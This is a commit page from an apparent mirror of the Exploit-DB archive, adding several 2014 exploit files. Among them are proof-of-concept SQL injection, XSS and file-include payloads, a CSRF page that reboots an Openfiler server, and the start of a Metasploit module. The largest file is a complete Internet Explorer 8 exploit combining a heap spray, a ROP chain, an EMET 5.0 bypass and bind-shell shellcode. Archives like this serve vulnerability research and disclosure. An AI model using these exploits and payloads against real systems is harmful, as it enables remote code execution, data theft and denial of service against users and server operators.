bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Updated 10_01_2014

Browse source
This commit is contained in:
Offensive Security 2014-10-01 04:44:03 +00:00
parent 66d3c41613
commit 501c894288
11 changed files with 840 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -31338,3 +31338,13 @@ id,file,description,date,author,platform,type,port
34806,platforms/php/webapps/34806.txt,"JNM Guestbook 3.0 'index.php' Cross Site Scripting Vulnerability",2009-07-09,Moudi,php,webapps,0
34807,platforms/php/webapps/34807.txt,"JNM Solutions DB Top Sites 1.0 'vote.php' Cross Site Scripting Vulnerability",2009-07-08,Moudi,php,webapps,0
34808,platforms/php/webapps/34808.txt,"Rapidsendit Clone Script 'admin.php' Insecure Cookie Authentication Bypass Vulnerability",2009-07-08,NoGe,php,webapps,0
34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
34810,platforms/php/webapps/34810.txt,"Tausch Ticket Script 3 vote.php descr Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
34811,platforms/php/webapps/34811.txt,"Linea21 1.2.1 'search' Parameter Cross Site Scripting Vulnerability",2009-07-08,"599eme Man",php,webapps,0
34812,platforms/php/webapps/34812.html,"Docebo 3.6 'description' Parameter Cross Site Scripting Vulnerability",2010-10-04,"High-Tech Bridge SA",php,webapps,0
34813,platforms/php/webapps/34813.txt,"Elxis 2009.2 rev2631 SQL Injection",2010-10-05,"High-Tech Bridge SA",php,webapps,0
34814,platforms/php/webapps/34814.txt,"SquirrelMail Virtual Keyboard Plugin 'vkeyboard.php' Cross Site Scripting Vulnerability",2010-10-05,"Moritz Naumann",php,webapps,0
34815,platforms/windows/remote/34815.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037)",2014-09-29,"ryujin & sickness",windows,remote,0
34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Include Vulnerability",2014-09-29,Vulnerability-Lab,ios,webapps,0
34817,platforms/windows/webapps/34817.rb,"Microsoft Exchange IIS HTTP Internal IP Address Disclosure",2014-09-29,"Nate Power",windows,webapps,0
34818,platforms/php/webapps/34818.html,"OpenFiler 2.99.1 - CSRF Vulnerability",2014-09-29,"Dolev Farhi",php,webapps,446

Can't render this file because it is too large.

239
platforms/ios/webapps/34816.txt Executable file
View file

@ -0,0 +1,239 @@
Document Title:
===============
GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325
Release Date:
=============
2014-09-22
Vulnerability Laboratory ID (VL-ID):
====================================
1325
Common Vulnerability Scoring System:
====================================
6.3
Product & Service Introduction:
===============================
The best Photo Transfer app on the App Store!Photo Transfer allows you to quickly transfer photos between your iPhone,
iPad, PC or Mac using your local Wi-Fi network, without any 3rd party transfer utilities. It can easily access your photo
libraries via wifi from any computer with a web browser(IE/Chrome/Safari) on the same wifi network, very easy to use!
(Copy of the Homepage: https://itunes.apple.com/en/app/wifi-fotos-ubertrager-+-uber/id902267412 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a file include vulnerability in the official Golden Soft Photo/Foto Uebertraeger v3.0 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-09-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Golden Soft
Product: Foto ?bertr?ger - iOS Mobile Web Application 3.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Briefcase Pro v4.0 iOS mobile wifi web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename and albumname` values of the `uploadPhotoPost` module. Remote attackers are able to inject
own files with malicious `filename or albumname` values in the `uploadPhotoPost` POST method request to compromise the mobile web-application.
The local file/path include execution occcurs in the index dir listing of the wifi interface context. The attacker is able to inject the local
file include request by usage of the `wifi interface` in connection with the vulnerable upload request.
Remote attackers are also able to exploit the filename/albumname validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.3.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] uploadPhotoPost
Vulnerable Parameter(s):
[+] filename & albumname
Affected Module(s):
[+] Index Path Dir Listing (http://localhost/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local wifi attackers in the network without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information or steps below to continue.
PoC: Url
http://localhost/./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!]
PoC: Exploit Photo Transfer.htm
<div class="album-title">>"./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png</div>
<a href="/group/1/0/100"><img class="album-overlay" alt="" width="140" height="160" src="/cvab-overlay.png">
<img class="album-thumb" width="90" height="90" alt="" src="/api/group/poster/1"> </a>
<!-- <div class="album-folder-img"><img alt="" width="140" height="160" src="/cvab.png"></div> -->
</div>
</div>
</div>
<!--end of preview thumbnails -->
</div>
<!-- end of wrapper-->
<div id="upload" class="wrapper">
<div id="intro">
<div class="col-1 padding-t20">
<!-- <h1><a href="/uploadPage"><img src="/upload.png" alt="" width="76" height="76"><br><br> -->
<!-- UPLOAD</a></h1> -->
<!-- <h2 class="center">Photos FROM This Computer</h2> -->
</div>
</div>
</div>
<!-- end of wrapper-->
<div id="container">
<div id="bg">
</div>
</div>
<!-- end of container and background-->
<div class="menu-bg ui-dark rad-0 center">
<div class="logo">
<a href="/groups">Photo Transfer +</a></div>
</div>
<!-- menu -->
</body>
</html>
</iframe></div>
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/uploadPhotoPost Load Flags[LOAD_BYPASS_CACHE ] Gr??e des Inhalts[7] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/uploadpage]
Content-Length[818]
Content-Type[multipart/form-data; boundary=---------------------------4611772826829]
Cookie[plupload_ui_view=thumbs]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
POST_DATA[-----------------------------4611772826829
Content-Disposition: form-data; name="name"
./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png
-----------------------------4611772826829
Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME VALUE!].png"
Content-Type: image/png
Status: 200[OK]
GET http://localhost/main/home Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[210] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/uploadpage]
Cookie[plupload_ui_view=thumbs]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[210]
Connection[keep-alive]
Date[Tue, 16 Sep 2014 15:07:38 GMT]
Solution - Fix & Patch:
=======================
The security vulnerability can be patched by a secure parse and encode of the file name value in the upload POST method request or sync.
Encode the file dir listing names and data output values to prevent further file include attacks. Restrict the file name extension validation
to fully secure the upload mechanism.
Security Risk:
==============
The security risk of the local file include web vulnerability in the filename value of the application is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

9
platforms/php/webapps/34809.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43710/info
Tausch Ticket Script is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Tausch Ticket Script 3 is vulnerable; other versions may also be affected.
http://www.example.com/suchauftraege_user.php?userid=[SQL]

9
platforms/php/webapps/34810.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43710/info
Tausch Ticket Script is prone to multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Tausch Ticket Script 3 is vulnerable; other versions may also be affected.
http://www.example.com/vote.php?descr=[SQL]

9
platforms/php/webapps/34811.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43711/info
Linea21 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Linea21 1.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/public/index.php?search="&#039;><script>alert(&#039;xss&#039;)</script>&rub=resultats-recherche&valid.x=4&valid.y=6&valid=valider

9
platforms/php/webapps/34812.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43721/info
Docebo is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Docebo 3.6.0.4 is vulnerable; prior versions may also be affected.
<form action="http://www.example.com/doceboLms/index.php?modname=advice&op=upadvice" method="post" name="main" > <input type="hidden" name="idAdvice" value="2" /> <input type="hidden" name="title" value="Hello" /> <input type="hidden" name="description" value='1"><script>alert(document.cookie)</script>' /> <input type="hidden" name="addadvice" value="Save changes" /> </form> <script> document.main.submit(); </script>

9
platforms/php/webapps/34813.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43743/info
Elxis is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Elxis 2009.2 electra rev2631 is vulnerable; other versions may be affected.
http://www.example.com/administrator/index2.php?option=com_content&sectionid=0&task=edit&hidemainmenu=1&id=999'+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+c

9
platforms/php/webapps/34814.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43749/info
The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Virtual Keyboard 0.9.1 and prior are vulnerable.
http://www.example.com/plugins/vkeyboard/vkeyboard.php?passformname=%22%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E%3Cscript%3E/*%20

47
platforms/php/webapps/34818.html Executable file
View file

@ -0,0 +1,47 @@
<!--
# Exploit Title: DoS via CSRF in openfiler
# Exploit author: Dolev Farhi @dolevff
# Date 07/05/2014
# Vendor homepage: http://www.openfiler.com
# Affected Software version: 2.99.1
# Alerted vendor: 7.5.14
# CVE: N/A
Software Description
=====================
Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
Storage Area Networking functionality in a single cohesive framework.
Vulnerability Description
=========================
it is possible to shutdown/reboot a server running openfiler and cause denial of service via CSRF due to missing session tokens.
Steps to reproduce / PoC:
=========================
-->
<html>
<div align="center">
<pre>
<h2><b>DoS <b></h2>
<body>
<form
action="https://ip.add.re.ss:446/admin/system_shutdown.html"
method="POST">
<input type="hidden" name="shutdowntype" value="reboot" />
<input type="hidden" name="delay" value="0" />
<input type="hidden" name="action" value="Shutdown" />
<input type="submit" name="submit" value="Attack" />
</form>
</body>
</div>
</html>

367
platforms/windows/remote/34815.html Executable file
View file

@ -0,0 +1,367 @@
<!--
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass
** Exploit Coded by sickness || EMET 5.0 bypass by ryujin
** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ ?
** Affected Software: Internet Explorer 8
** Vulnerability: Fixed Col Span ID
** CVE: CVE-2012-1876
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0
-->
<html>
<body>
<div id="evil"></div>
<table style="table-layout:fixed" ><col id="132" width="41" span="9" >  </col></table>
<script language='javascript'>
function strtoint(str) {
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
}
var free = "EEEE";
while ( free.length < 500 ) free += free;
var string1 = "AAAA";
while ( string1.length < 500 ) string1 += string1;
var string2 = "BBBB";
while ( string2.length < 500 ) string2 += string2;
var fr = new Array();
var al = new Array();
var bl = new Array();
var div_container = document.getElementById("evil");
div_container.style.cssText = "display:none";
for (var i=0; i < 500; i+=2) {
fr[i] = free.substring(0, (0x100-6)/2);
al[i] = string1.substring(0, (0x100-6)/2);
bl[i] = string2.substring(0, (0x100-6)/2);
var obj = document.createElement("button");
div_container.appendChild(obj);
}
for (var i=200; i<500; i+=2 ) {
fr[i] = null;
CollectGarbage();
}
function heapspray(cbuttonlayout) {
CollectGarbage();
var rop = cbuttonlayout + 4161; // RET
var rop = rop.toString(16);
var rop1 = rop.substring(4,8);
var rop2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 11360; // POP EBP
var rop = rop.toString(16);
var rop3 = rop.substring(4,8);
var rop4 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
var rop = rop.toString(16);
var rop5 = rop.substring(4,8);
var rop6 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12377; // POP EBX
var rop = rop.toString(16);
var rop7 = rop.substring(4,8);
var rop8 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 642768; // POP EDX
var rop = rop.toString(16);
var rop9 = rop.substring(4,8);
var rop10 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12201; // POP ECX --> Changed
var rop = rop.toString(16);
var rop11 = rop.substring(4,8);
var rop12 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5504544; // Writable location
var rop = rop.toString(16);
var writable1 = rop.substring(4,8);
var writable2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12462; // POP EDI
var rop = rop.toString(16);
var rop13 = rop.substring(4,8);
var rop14 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 12043; // POP ESI --> changed
var rop = rop.toString(16);
var rop15 = rop.substring(4,8);
var rop16 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 63776; // JMP EAX
var rop = rop.toString(16);
var jmpeax1 = rop.substring(4,8);
var jmpeax2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 85751; // POP EAX
var rop = rop.toString(16);
var rop17 = rop.substring(4,8);
var rop18 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 4936; // VirtualProtect()
var rop = rop.toString(16);
var vp1 = rop.substring(4,8);
var vp2 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
var rop = rop.toString(16);
var rop19 = rop.substring(4,8);
var rop20 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 234657; // PUSHAD
var rop = rop.toString(16);
var rop21 = rop.substring(4,8);
var rop22 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 408958; // PUSH ESP
var rop = rop.toString(16);
var rop23 = rop.substring(4,8);
var rop24 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2228408; // POP ECX
var rop = rop.toString(16);
var rop25 = rop.substring(4,8);
var rop26 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1586172; // POP EAX
var rop = rop.toString(16);
var rop27 = rop.substring(4,8);
var rop28 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
var rop = rop.toString(16);
var rop29 = rop.substring(4,8);
var rop30 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1884912; // PUSH EAX
var rop = rop.toString(16);
var rop31 = rop.substring(4,8);
var rop32 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
var rop = rop.toString(16);
var rop33 = rop.substring(4,8);
var rop34 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
var rop = rop.toString(16);
var rop35 = rop.substring(4,8);
var rop36 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 5036248; // ADD ESP,0C
var rop = rop.toString(16);
var rop37 = rop.substring(4,8);
var rop38 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX
var rop = rop.toString(16);
var rop39 = rop.substring(4,8);
var rop40 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI
var rop = rop.toString(16);
var rop41 = rop.substring(4,8);
var rop42 = rop.substring(0,4); // } RET
var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX
var rop = rop.toString(16);
var rop43 = rop.substring(4,8);
var rop44 = rop.substring(0,4); // } RET
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
var getmodulew = getmodulew.toString(16);
var getmodulew1 = getmodulew.substring(4,8);
var getmodulew2 = getmodulew.substring(0,4); // } RET
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
shellcode+= unescape("%u4141%u4141"); // PADDING
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
// EMET disable part 0x01
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u10c4%u076d"); // EMET_STRING_PTR (GetModuleHandle argument)
shellcode+= unescape("%ua84c%u000a"); // EMET_CONFIG_STRUCT offset
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u10c0%u076d"); // MEM_ADDRESS_PTR (Store EMET base address here for later)
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u104c%u076d"); // Get fake DecodePointer argument from the stack and update it with the encoded value
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN
shellcode+= unescape("%u10c0%u076d"); // Get EMET base address Ptr
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u80b0%u0004"); // Get DecodePointer offset from the stack
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u9090%u9090"); // Fake DecodePointer argument (Will be patched)
shellcode+= unescape("%u10bc%u076d"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0558%u0000"); // ROP Protections offset
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN
shellcode+= unescape("%u0000%u0000"); // NULL
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN
// EMET disable part 0x01 end
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
shellcode+= unescape("%u0040%u0000"); // 0x00000040
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP
// Store various pointers here
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u14eb"); // NOPs
shellcode+= unescape("%u4242%u4242"); // Decoded CONFIG structure pointer
shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*
shellcode+= "EMET"; // EMET string
shellcode+= unescape("%u0000%u0000"); // EMET string
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// Store various pointers here
// EMET disable part 0x02
// MOV EAX,DWORD PTR DS:[076D10BCH]
// MOV ESI,DWORD PTR [EAX+518H]
// SUB ESP,2CCH
// MOV DWORD PTR [ESP],10010H
// MOV EDI,ESP
// MOV ECX,2CCH
// ADD EDI,4
// SUB ECX,4
// XOR EAX,EAX
// REP STOS BYTE PTR ES:[EDI]
// PUSH ESP
// PUSH 0FFFFFFFEH
// CALL ESI
shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +
"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +
"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +
"%ufe6a%ud6ff");
shellcode+= unescape("%u9090%u9090"); // NOPs
shellcode+= unescape("%u9090%u9090"); // NOPs
// EMET disable part 0x02 end
// Bind shellcode on 4444 :)
// msf > generate -t js_le
// windows/shell_bind_tcp - 342 bytes
// http://www.metasploit.com
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
// I would keep the shellcode the same size for better reliability :)
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
"%u006a%uff53%u41d5");
// Total spray should be 1000
var padding = unescape("%u9090");
while (padding.length < 1000)
padding = padding + padding;
var padding = padding.substr(0, 1000 - shellcode.length);
shellcode+= padding;
while (shellcode.length < 100000)
shellcode = shellcode + shellcode;
var onemeg = shellcode.substr(0, 64*1024/2);
for (i=0; i<14; i++) {
onemeg += shellcode.substr(0, 64*1024/2);
}
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
var spray = new Array();
for (i=0; i<100; i++) {
spray[i] = onemeg.substr(0, onemeg.length);
}
}
function leak(){
var leak_col = document.getElementById("132");
leak_col.width = "41";
leak_col.span = "19";
}
function get_leak() {
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
str_addr = str_addr - 1410704;
var hex = str_addr.toString(16);
//alert(hex);
setTimeout(function(){heapspray(str_addr)}, 50);
}
function trigger_overflow(){
var evil_col = document.getElementById("132");
evil_col.width = "1245880";
evil_col.span = "44";
}
setTimeout(function(){leak()}, 400);
setTimeout(function(){get_leak()},450);
setTimeout(function(){trigger_overflow()}, 700);
</script>
</body>
</html>

123
platforms/windows/webapps/34817.rb Executable file
View file

@ -0,0 +1,123 @@
# Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability
# Google Dork: NA
# Date: 08/01/2014
# Exploit Author: Nate Power
# Vendor Homepage: microsoft.com
# Software Link: NA
# Version: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# Tested on: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# CVE : NA
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
